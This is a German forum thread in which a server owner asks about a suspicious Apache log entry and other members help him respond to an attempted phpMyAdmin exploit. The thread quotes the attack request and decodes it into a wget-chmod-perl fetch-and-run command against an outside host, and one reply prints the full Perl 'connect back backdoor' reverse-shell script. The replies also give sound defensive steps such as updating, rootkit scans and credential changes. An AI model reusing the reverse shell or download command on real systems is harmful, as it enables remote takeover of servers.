Verdächtige Bewegung in Log-File

Nexlamar

Nexlamar

New Member
Hi!

Ich glaube ich habe ein Problem, denn ich habe heute morgen folgendes in meinem Apache-Log gefunden:

Code: 
92.81.154.155 - - [30/Aug/2009:07:55:49 +0000] "GET //phpmyadmin/config/config.inc.php?c=cd%20/tmp%20;%20wget%20mucul.do.am/dc.pl%20;%20chmod%20+x%20dc.pl%20;%20perl%20dc.pl%20202.134.110.35%2031337 HTTP/1.1" 200 118 "-" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"

Bei genaueren Ansehen von dc.pl schlägt bei mir der Alarm.

Danke für Eure Einschätzung!
 
Hallo!
Code: 
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
  printf "Usage: $0 [Host] <Port>\n";
  exit(1);
}
print "
[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
  $port = $ARGV[1];
}
print "
[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
  die("Unable to Connect\n");
}
print "
[*] Spawning Shell\n";
if (!fork( )) {
  open(STDIN,">&SERVER");
  open(STDOUT,">&SERVER");
  open(STDERR,">&SERVER");
  exec {'/bin/sh'} '-bash' . "\0" x 4;
  exit(0);
}
print "
[*] Datached\n\n";ro10655:/tmp#
Ist dein phpMyAdmin denn aktuell?

mfG
Thorsten
 
Hi!

Sieht beängstigend aus - er scheint aber nichts auf den Server geschleust zu haben - ich vermute ich habe eine MyAdmin Sicherheitslücke.


Nein, es ist nicht ganz aktuell - ich aktualisiere.

Was kann denn hier noch passiert sein / Woraus hat er Zugriff?

Danke!
 
Jo, da wird versucht, eine phpma Lücke auszunutzen. Anscheinend lässt es phpma zu, beliebigen Code auf dem Server auszuführen:

Code: 
cd /tmp; 
wget mucul.do.am/dc.pl; 
chmod +x dc.pl; 
perl dc.pl 202.134.110.35

Ist denn etwas in Deinem TMP-Ordner?
 
Last edited by a moderator:
Hi!

Danke für Deine Hinweise.

Der tmp-Ordner ist leer. Aber ich habe jetzt erst Mal phpma komplett deinstalliert - ist im Prinzip Luxus. Damit sollten sich auch keine Lücken mehr nutzen lassen ;)

Noch eine Frage: Ich habe an einem Tag extrem viel Outgoing Traffic - ich vermute hier wurde das System schon mißbraucht. Ich gehe gerade die Logs durch, finde aber nichts. Hast Du noch einen Tipp?
 
Ein .htaccess Schutz bzw. das Disablen der PHP exec-Funktion hätten in Verbindung mit einem Update von phpma auch gereicht :=)

Allerdings ist das Kind jetzt schon in den Brunnen gefallen, eventuell hast Du ein Rootkit auf dem Rechner. Da hilft auch das nachträgliche Rumpatchen nichts mehr, der Angreifer hat längst eine Backdoor installiert.

Was für eine Distribution nutzt Du? Was sagen netstat -tuap & lsof -i & rkhunter -c?

Den rkhunter musst du sicher erst installieren...
 
Merke ich mir, falls ich phpma wieder installiere - Ich teste Deine Vorschläge / chkrootkit blieb (mit Außnahme der bekannten Alerts) ergebnislos. Ich nutze Debian - das System selbst ist natürlich auf dem neuesten Stand ;)
 
Das ist der Exploit, schau mal ob deine phpMyAdmin Version dabei ist.

http://www.milw0rm.com/exploits/8921

Wenn das System auf dem neusten Stand ist hat er es wohl nicht gerooted. Aber ne phpshell kann er installieren. Achte auf veränderte oder gar fremde Dateien in den Webroots. Und ändere die Daten zu deinen Adminpanels wie confixx ... etc. wenn du dir sicher bist das der Server sauber ist.
 
Last edited by a moderator:
You must log in or register to reply here.
Back
Top